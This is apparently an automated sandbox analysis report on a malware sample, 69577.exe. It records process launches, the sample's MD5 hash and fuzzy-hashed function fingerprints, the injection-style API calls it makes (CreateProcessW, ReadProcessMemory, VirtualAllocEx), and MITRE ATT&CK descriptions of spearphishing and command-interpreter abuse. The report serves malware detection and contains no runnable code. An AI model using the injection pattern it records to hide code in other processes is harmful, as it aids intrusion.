Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: 69577.exe PID: 2468 Parent PID: 2320

General

Start time:	12:53:53
Start date:	24/02/2021
Path:	C:\Users\Public\69577.exe
Wow64 process (32bit):	false
Commandline:	{path}
Imagebase:	0x3e0000
File size:	766976 bytes
MD5 hash:	8C596990203F7D15651498FDBA84B5F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: 69577.exe PID: 2464 Parent PID: 2320

General

Start time:	12:53:53
Start date:	24/02/2021
Path:	C:\Users\Public\69577.exe
Wow64 process (32bit):	false
Commandline:	{path}
Imagebase:	0x3e0000
File size:	766976 bytes
MD5 hash:	8C596990203F7D15651498FDBA84B5F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 69577.exe PID: 2320 Parent PID: 1324 69577.exeCOMMON

Executed Functions

Function 004F2FE0, Relevance: 12.2, Strings: 9, Instructions: 933COMMON

Download Yara Rule

Strings

J, xrefs: 004F3595
(, xrefs: 004F3AD5
F, xrefs: 004F3BED
J, xrefs: 004F3970
I, xrefs: 004F3824
F, xrefs: 004F308D
D, xrefs: 004F3767
H, xrefs: 004F33BC
B, xrefs: 004F3EEC

Memory Dump Source

Source File: 00000004.00000002.2116017583.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID: ($B$D$F$F$H$I$J$J
API String ID: 0-832423104
Opcode ID: a6f89a242292014f013ebace19c2cdbda85436272ac8a3e767b65de71053d013
Instruction ID: d0ed2923e4b94c74378823de86d5108e0b0e54a4396c03f2e862a176da3ad23f
Opcode Fuzzy Hash: a6f89a242292014f013ebace19c2cdbda85436272ac8a3e767b65de71053d013
Instruction Fuzzy Hash: E09212B0D4922DCFDB24DF24C848BEDB6B5AB49305F1081EA8209A7291DB784FC5DF59

Uniqueness

Uniqueness Score: -1.00%

Function 001E04E0, Relevance: 1.7, Instructions: 1656COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7f7aaae43f7c443ced8cef3381474b07716ff6788cb3b9a90b4f70ee3a03f3d
Instruction ID: ce7022a7b61201a0bfc6ac1110e4bff2e3f3d97b88aeb399661c695501d7bf7a
Opcode Fuzzy Hash: c7f7aaae43f7c443ced8cef3381474b07716ff6788cb3b9a90b4f70ee3a03f3d
Instruction Fuzzy Hash: 32030834A15719CFC725DF64C898AA9B3B1FF8A304F1186E9E4096B361DB35AE85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 001E00A4, Relevance: 1.7, Instructions: 1654COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e551a17647fab42ce19510502c67518dc525b9f2d0ebfded31cff9396e8e2b76
Instruction ID: 2b2b37b1fa80bbb620e1454112d6b21e908e42e7e068c4a26805d66fb4adcb9e
Opcode Fuzzy Hash: e551a17647fab42ce19510502c67518dc525b9f2d0ebfded31cff9396e8e2b76
Instruction Fuzzy Hash: 17030834A15719CFC725DF64C888AA9B3B1FF8A304F1186E9E4096B361DB35AE85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 001E2A00, Relevance: 1.4, Strings: 1, Instructions: 162COMMON

Download Yara Rule

Strings

fCl, xrefs: 001E2A80

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: fCl
API String ID: 0-625834680
Opcode ID: 831ae07a21a7d9a67dba14de9091c6215467958ac9a40ec274f49b4e8c936910
Instruction ID: db0c045256493df4b7de59b575a7ad7cc4041dac2dd96ff0d76057e2666143ee
Opcode Fuzzy Hash: 831ae07a21a7d9a67dba14de9091c6215467958ac9a40ec274f49b4e8c936910
Instruction Fuzzy Hash: 6D61C2B4E00658CFDB18CFAAD9546AEBBF6BF88300F10852AE419EB350EB745945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001E9B4A, Relevance: .4, Instructions: 434COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bbdb223327a3cb26ee7f22af0fe7fd0b292dc8fae05b1d554c0f1b44358db34
Instruction ID: b00ba84b4478dc637fa81b046684ed11e9cdef3fe2b11653232e7904fbb47b47
Opcode Fuzzy Hash: 6bbdb223327a3cb26ee7f22af0fe7fd0b292dc8fae05b1d554c0f1b44358db34
Instruction Fuzzy Hash: 4621D671D096889FDB09CFA7985419EBFF3AFCA300F19C4AA8808AB265DB7416458B51

Uniqueness

Uniqueness Score: -1.00%

Function 001E9CD0, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fabab659a05e9876191b4f5d9e7b55ef70a233d33036a8cde32e1b29bfa236f4
Instruction ID: f3cb2e4a270e6ff91682d92af359ceef9a62f928a1c9639826ecd9bc9f0d050c
Opcode Fuzzy Hash: fabab659a05e9876191b4f5d9e7b55ef70a233d33036a8cde32e1b29bfa236f4
Instruction Fuzzy Hash: 8D11ADB1D056489BEB0CDFABD8441DEFAF7BFC8300F14C579981866268EB7416458F51

Uniqueness

Uniqueness Score: -1.00%

Function 001E28A1, Relevance: 2.6, Strings: 2, Instructions: 104COMMON

Download Yara Rule

Strings

fCl, xrefs: 001E294F
fCl, xrefs: 001E28FD

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: fCl$fCl
API String ID: 0-3166565758
Opcode ID: c57f7cf8be5aa019019b90b73d4e5be558b1d351b370302db065e986fb4f8980
Instruction ID: fcb1ae73d8209f9cdeac3e61312b28681470eabd55a6047f55c5dfe7a2f7965c
Opcode Fuzzy Hash: c57f7cf8be5aa019019b90b73d4e5be558b1d351b370302db065e986fb4f8980
Instruction Fuzzy Hash: F641C174E00218DFCB08DFA9D954AEEBBB2FF89300F14842AE815AB355DB355A46CF51

Uniqueness

Uniqueness Score: -1.00%

Function 004F41B0, Relevance: 1.7, APIs: 1, Instructions: 224processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004F438C

Memory Dump Source

Source File: 00000004.00000002.2116017583.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: bcfdd618a944bdfcb8e1d7c8935a40cfbb7771649bce12af344abbe70ea937d0
Instruction ID: c8399b67a9194ce94c1cb13b8f535b099c118e7b4bf84ea2758e47748cf5b522
Opcode Fuzzy Hash: bcfdd618a944bdfcb8e1d7c8935a40cfbb7771649bce12af344abbe70ea937d0
Instruction Fuzzy Hash: EC81A074D0026D8FDF20CFA5C940BEEBBB6AF49304F1095AAE548B7250EB349A85DF54

Uniqueness

Uniqueness Score: -1.00%

Function 004F4600, Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 004F46BD

Memory Dump Source

Source File: 00000004.00000002.2116017583.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b936f71ec47d972ed64e5879d5ac7b08ff4b47a48906fbd9234d386aaaac4ddd
Instruction ID: 595e4fe1674407fa26787c460d2fb0824e79ad80e3bd6228e36e07190fa57283
Opcode Fuzzy Hash: b936f71ec47d972ed64e5879d5ac7b08ff4b47a48906fbd9234d386aaaac4ddd
Instruction Fuzzy Hash: 9A4178B9D042589FCF10CFA9D984AEEFBB1BB49310F24906AE814B7310D335AA45CF65

Uniqueness

Uniqueness Score: -1.00%

Function 004F4608, Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 004F46BD

Memory Dump Source

Source File: 00000004.00000002.2116017583.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 229cb66c7afc27a03c0b8b940b35264478111bcf72e7fb1eed9916d0272e9e0c
Instruction ID: 02d2a0ce45e32849a63526f191282ecdbab22fe88055e4e7261549e8237aff22
Opcode Fuzzy Hash: 229cb66c7afc27a03c0b8b940b35264478111bcf72e7fb1eed9916d0272e9e0c
Instruction Fuzzy Hash: E24189B9D042589FCF10CFA9D984AEEFBB1BB49310F20902AE814B7310D335AA45CF65

Uniqueness

Uniqueness Score: -1.00%

Function 004F4730, Relevance: 1.6, APIs: 1, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 004F47DD

Memory Dump Source

Source File: 00000004.00000002.2116017583.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 35412c029798c23fc0f2f813b9eb5ffb80c4bb10f836d2c43f64bf1d61647c24
Instruction ID: f840d67f9f4041a4f2b75e95658ef6fee02bc5f1739f3e0676e9ce59384c0ec7
Opcode Fuzzy Hash: 35412c029798c23fc0f2f813b9eb5ffb80c4bb10f836d2c43f64bf1d61647c24
Instruction Fuzzy Hash: 143166B8D042589FCF10CFA9D984AEEFBB5BB49310F20A01AE914B7310D735A906CF65

Uniqueness

Uniqueness Score: -1.00%

Function 001E3346, Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

E, xrefs: 001E334E

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: 63bf699a592beb77c8caafe5bbc3c3b52dfec0b93fdba192202158babeb1aaad
Instruction ID: 85480249a45479d97f89ce30ff847c52383c0b97176143465c0b8ffa9b0eb794
Opcode Fuzzy Hash: 63bf699a592beb77c8caafe5bbc3c3b52dfec0b93fdba192202158babeb1aaad
Instruction Fuzzy Hash: 8D51E274E04659CFCB04DFEAC488AEEFBF1BF49314F289559E429AB245C7349A81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001E34D0, Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

\-]l, xrefs: 001E357B

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: \-]l
API String ID: 0-3676026079
Opcode ID: 5135622350aa4fe7d9635875259368775a11fc1dc77f814a6d238337d69ba03b
Instruction ID: ee0e93c585dfc2edcd7fd0d4b04e3af4bcade664f7b4e3b75c0e8ce35548cdc7
Opcode Fuzzy Hash: 5135622350aa4fe7d9635875259368775a11fc1dc77f814a6d238337d69ba03b
Instruction Fuzzy Hash: 6741D274E00758DBDB08DFE6D859AADBBB2BF89300F24802AD815BB354DB709A45CF40

Uniqueness

Uniqueness Score: -1.00%

Function 001E2338, Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

fCl, xrefs: 001E237A

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: fCl
API String ID: 0-625834680
Opcode ID: 97a5afa31e6ac9194c612f4cb238dc4ec4806737d1e3e617f46b7b251f85c165
Instruction ID: 0f6f76937a23d5627d6a9ce0434190f2a5e853b5fc928b00caedfd76bcd0ec85
Opcode Fuzzy Hash: 97a5afa31e6ac9194c612f4cb238dc4ec4806737d1e3e617f46b7b251f85c165
Instruction Fuzzy Hash: 632115B4E042199FCB09DFA5E9955EEBBB2BF89300F14846AE405B7390DB381945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E0198, Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

fCl, xrefs: 001E237A

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: fCl
API String ID: 0-625834680
Opcode ID: 21baad093724fc7c2ff6c16d01942a38fe381e81a7b5422d1e9c7262ae1b708e
Instruction ID: 054b0a7595fce16eedae6b63f82c8d3010d6a2e36ce58b321343958ac86abf0a
Opcode Fuzzy Hash: 21baad093724fc7c2ff6c16d01942a38fe381e81a7b5422d1e9c7262ae1b708e
Instruction Fuzzy Hash: A621F278E002199FCB08DFA5E9945EEBBB6FF88301F108429E415B3790DB345945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E2E4C, Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 763b2ce743749d51db5ef3be484e4807af785931ab1206e67290fcc1330a9967
Instruction ID: 05cc18a183bc5d9843cebebab46fd2c09a2d30ab0f5d59718cb9dd8b7d51df10
Opcode Fuzzy Hash: 763b2ce743749d51db5ef3be484e4807af785931ab1206e67290fcc1330a9967
Instruction Fuzzy Hash: 02911074D00268CFDB24CFA5C884BEDBBB6BF49314F1085A9E518AB261DB319E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0013D1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115786494.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1490f3161d125ad82e9be850686b8363ff1b8f9bb9bb0b5e8d3b4e98ae4b8d7
Instruction ID: d56178ad41e94d4e7ce5a3ec28b2fbff7f4df675f923757a3e59a0fc389e69ab
Opcode Fuzzy Hash: e1490f3161d125ad82e9be850686b8363ff1b8f9bb9bb0b5e8d3b4e98ae4b8d7
Instruction Fuzzy Hash: 8021D475604204EFDB15DF64F9C4B26BBA5FB84314F24C9ADE8094B246C736D846CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0013D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115786494.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96b38fd24956d833cecab2b80d998411105c3c44ed090ddae03d5c9b0104e7ff
Instruction ID: 08a07ad81858c487449671e8dd44a66cdf24b4126c1c4c5853b2db42ac95caea
Opcode Fuzzy Hash: 96b38fd24956d833cecab2b80d998411105c3c44ed090ddae03d5c9b0104e7ff
Instruction Fuzzy Hash: 9321C275604244DFDB18DF64F884B26BBA5FB84B14F34C9ADE8494B246C336D847CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0013D006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115786494.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ed30608f16516bb65b0359e2845c1c9ba2debd07d3c79d2fb533dd8cd20b247
Instruction ID: 1b85cca28719febf0f2fee08a41750d4e08be8bddb3f9aaf2cc7d0dece832112
Opcode Fuzzy Hash: 8ed30608f16516bb65b0359e2845c1c9ba2debd07d3c79d2fb533dd8cd20b247
Instruction Fuzzy Hash: 462171754083809FCB06CF14E994715BFB1EB46314F28C5DAD8498F256C33AD816CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0013D1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115786494.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d853270eadad65f717b2962ab187c60c632e6650db00fef84f18f46f5932069d
Instruction ID: 9c034837251abe4582c11cde759fa31082c72c38bd9911cce7b928832233f19e
Opcode Fuzzy Hash: d853270eadad65f717b2962ab187c60c632e6650db00fef84f18f46f5932069d
Instruction Fuzzy Hash: 31119D75504280DFDB12CF10E5C4B16FFA1FB85314F28C6ADD8494B656C33AD85ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0012D1C1, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115774189.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ddad0e3a5495300c44f8038fd0f786b6677643a529f67e72d66f847d39e1e85
Instruction ID: e526fb1a0701b5733d465b66abab2a12813ebc2833d55a83ec5c256190f83d7d
Opcode Fuzzy Hash: 9ddad0e3a5495300c44f8038fd0f786b6677643a529f67e72d66f847d39e1e85
Instruction Fuzzy Hash: 2B01A735004764DBEB648A65F884BA7BB98EF51324F18C45AED441B283C378DC50C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 001E8383, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20e92a993ac56fd18837fb30b3437478eee134fef38cbc1676e300774e8922f4
Instruction ID: 1544fe33f86d4643b1f6b4ebf8424e452a5233aea81354f419de175e499835e8
Opcode Fuzzy Hash: 20e92a993ac56fd18837fb30b3437478eee134fef38cbc1676e300774e8922f4
Instruction Fuzzy Hash: 8D113FB8D042A9DFCB64CF99D880BDCB7B0BB08354F1094E6E50EB7210D7309A859F24

Uniqueness

Uniqueness Score: -1.00%

Function 001E9DAC, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f82ba673d591d96465fa06d1f9b3d1162a8a69a6025f2e67281ec2ef340c241
Instruction ID: 1427beebf03a431bc05073b4d42ac7fff79c3eb9beb88398ea577e5b111ce931
Opcode Fuzzy Hash: 8f82ba673d591d96465fa06d1f9b3d1162a8a69a6025f2e67281ec2ef340c241
Instruction Fuzzy Hash: 3201257490855ACFCB64CFA9C9547FCBAB8FF09300F615069D95AA2381E7302A41AB52

Uniqueness

Uniqueness Score: -1.00%

Function 0012D1C0, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115774189.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e39be1d18dfb3695087589d7e154d5e16bd425cfbdc3c648ba56e66cee156cd
Instruction ID: 069561bd2b1f38270239a3acc2bd610ffe83c8e3544948037fe2df3b7c255a73
Opcode Fuzzy Hash: 9e39be1d18dfb3695087589d7e154d5e16bd425cfbdc3c648ba56e66cee156cd
Instruction Fuzzy Hash: C5F0C232004254ABEB108A55E888B67FF98EF91324F18C45AED081B282C378DC44CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 001E0439, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebf49d7c8fc4b6fc98eb6b3a885b63bb25f55a733f734c7a3e6c4876213faba8
Instruction ID: 7e10c689ce0411dfe642a504ff2fc5d5ee9f988f2391cd2db9ecf83f53ed79e9
Opcode Fuzzy Hash: ebf49d7c8fc4b6fc98eb6b3a885b63bb25f55a733f734c7a3e6c4876213faba8
Instruction Fuzzy Hash: A7F0A031945288AFCB05EFF0CA66A6D77B4DF47204B0418A9E109E72A2DB359E40EB12

Uniqueness

Uniqueness Score: -1.00%

Function 001E0498, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f549d5dd98e950e8beb5b4029ca0feabab8464a83850dfaeecae4e90d650ed7
Instruction ID: c014c945342b8244c716a983dae418d477bc0819dd0272f688fc9e8a82cb862a
Opcode Fuzzy Hash: 4f549d5dd98e950e8beb5b4029ca0feabab8464a83850dfaeecae4e90d650ed7
Instruction Fuzzy Hash: EDF0A07080A6849FCB16CBB599916BCBFB19F8A200F1501EAE445A76B2E7740E80CB02

Uniqueness

Uniqueness Score: -1.00%

Function 001E36A0, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdd2e924a9bc85721e175976dade322f7810b4e88bc3d9b6055b4591ae9297f5
Instruction ID: c9f975e8d7374872d6053627f7b9e37d68e515659f35139a9f8db160f0ee70aa
Opcode Fuzzy Hash: bdd2e924a9bc85721e175976dade322f7810b4e88bc3d9b6055b4591ae9297f5
Instruction Fuzzy Hash: C3F05834D08248EFCB05DFA9C8889ACBBB4EF49711F0080AAED049B362C3319B48DF41

Uniqueness

Uniqueness Score: -1.00%

Function 001E2CA0, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f33728b6a90b9878ad501849f90191758ffc66bda74bfd98f9e559f40e99e52
Instruction ID: 248880aa51e764a76d36c25c35bbb6b04b122929ecfc68bb49c31372ee0e1481
Opcode Fuzzy Hash: 1f33728b6a90b9878ad501849f90191758ffc66bda74bfd98f9e559f40e99e52
Instruction Fuzzy Hash: 18F01C70D19388AFCB45DFA5D8546ACBFF4BB8A304F1481EAD84993352D7345A45CF42

Uniqueness

Uniqueness Score: -1.00%

Function 001E0448, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75820c17171dffc73becfcabfef4f38bfc864b3c9c4336b622737164762b207c
Instruction ID: ba463f4ab2d901415212d45bb630d430bc887786394705fc3316c9d0fc676758
Opcode Fuzzy Hash: 75820c17171dffc73becfcabfef4f38bfc864b3c9c4336b622737164762b207c
Instruction Fuzzy Hash: 2DE04F709412489BCB44EBF08A5AABEB3A9DB46205F1428ACA50AA3291DF755F40EA45

Uniqueness

Uniqueness Score: -1.00%

Function 001E0094, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54f74754d03522aa8f2f4c258fa3960cfa5539596c8a975ca505ac676cfe4750
Instruction ID: 7c577639b389973cdae1acbfb9803bdc913e9ededeaa558be17a9203deeb9ba9
Opcode Fuzzy Hash: 54f74754d03522aa8f2f4c258fa3960cfa5539596c8a975ca505ac676cfe4750
Instruction Fuzzy Hash: C2E0DF30905508EFC714EFAACA41ABEF7F8DF8A305F1040A8E408732A0EB709E80DB54

Uniqueness

Uniqueness Score: -1.00%

Function 001E3479, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef13619cd949054a1726bd6a2a372af599608acdac75479d155dafbb515e83f1
Instruction ID: 7b76333143bb56e11a1dc0ef55e2b81fe37dec5a209099999aa222575091ebbb
Opcode Fuzzy Hash: ef13619cd949054a1726bd6a2a372af599608acdac75479d155dafbb515e83f1
Instruction Fuzzy Hash: 4CE06D3090A3CC9FCB46DFB498682ED7FB0AF46215F1480E9D84897253E7300B94CB12

Uniqueness

Uniqueness Score: -1.00%

Function 001EB6BF, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 059e66cf7ef73c8e13d647385649948a5ccb07d0b07c216a70ad5e011f4b4892
Instruction ID: eaa69b67a82bf4bfa04afd7256f1776a9fd081455cab8a831f3533ab5b64dcf6
Opcode Fuzzy Hash: 059e66cf7ef73c8e13d647385649948a5ccb07d0b07c216a70ad5e011f4b4892
Instruction Fuzzy Hash: 11E0E278D0D6988BCB048FE1D4884AEBBB2AF09300B1110AA94A6AB692D72108009F00

Uniqueness

Uniqueness Score: -1.00%

Function 001E9D7B, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b935feff17710fabc628a8711c053cfd94a9dc77d979d2e9472843004b74c60
Instruction ID: 43f285f00e448d44bca2d431557f018dff5117b568cb7fab82f233d5db61a376
Opcode Fuzzy Hash: 8b935feff17710fabc628a8711c053cfd94a9dc77d979d2e9472843004b74c60
Instruction Fuzzy Hash: 72D0C975909549CFC744DF95C6543BDBAF9EB18308FB010148119E2342E3752E049B92

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001E3700, Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

.@l, xrefs: 001E384B
@27m, xrefs: 001E38FD

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: .@l$@27m
API String ID: 0-3735299131
Opcode ID: ca07dcf700f12dda0ea67aaeda271a8a5106d9bc20602f6db461189f612c1a9c
Instruction ID: 8f9ea17b39f98aafba7e92e939200755f77e7d9460d9d7e6675df0d275df4534
Opcode Fuzzy Hash: ca07dcf700f12dda0ea67aaeda271a8a5106d9bc20602f6db461189f612c1a9c
Instruction Fuzzy Hash: 1E513BB49043098FDB44EFBAE955ADEBBF7AB84304F04C939E004AB268DF745A458B51

Uniqueness

Uniqueness Score: -1.00%

Function 001E568D, Relevance: 1.4, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

9, xrefs: 001E59B9

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: 9
API String ID: 0-2366072709
Opcode ID: 290a7ea8bca81c5452fe34b7f624af3560afd402bfe8b4976661c0cbf6d23f3f
Instruction ID: 1da0876e012a944e2c25f416b3e4f63ca52c9434acb2f6b98f185e6ded9a3ecc
Opcode Fuzzy Hash: 290a7ea8bca81c5452fe34b7f624af3560afd402bfe8b4976661c0cbf6d23f3f
Instruction Fuzzy Hash: 2B919FB0E0062D8BDB64DF29CE45B8ABBF5BF89304F4041E5D24CA6245E7319E95CF06

Uniqueness

Uniqueness Score: -1.00%

Function 001E3941, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2115841372.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a08da929eb08036ed1635cf0cd8319f3662130c5efc3efcc0530910964e61de8
Instruction ID: 2047b492f45624aa24688843a3ab95ab9e28cbd08070ceece2097a6db20e5789
Opcode Fuzzy Hash: a08da929eb08036ed1635cf0cd8319f3662130c5efc3efcc0530910964e61de8
Instruction Fuzzy Hash: C94160B1E056588BEB5CCF678D4469AFAF3AFC5300F14C1BAC54CA7255DB304A868F15

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.
Tactics:	Initial Access
Data Sources:	DNS records, Detonation chamber, Email gateway, Mail server, Packet capture, SSL/TLS inspection, Web proxy
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

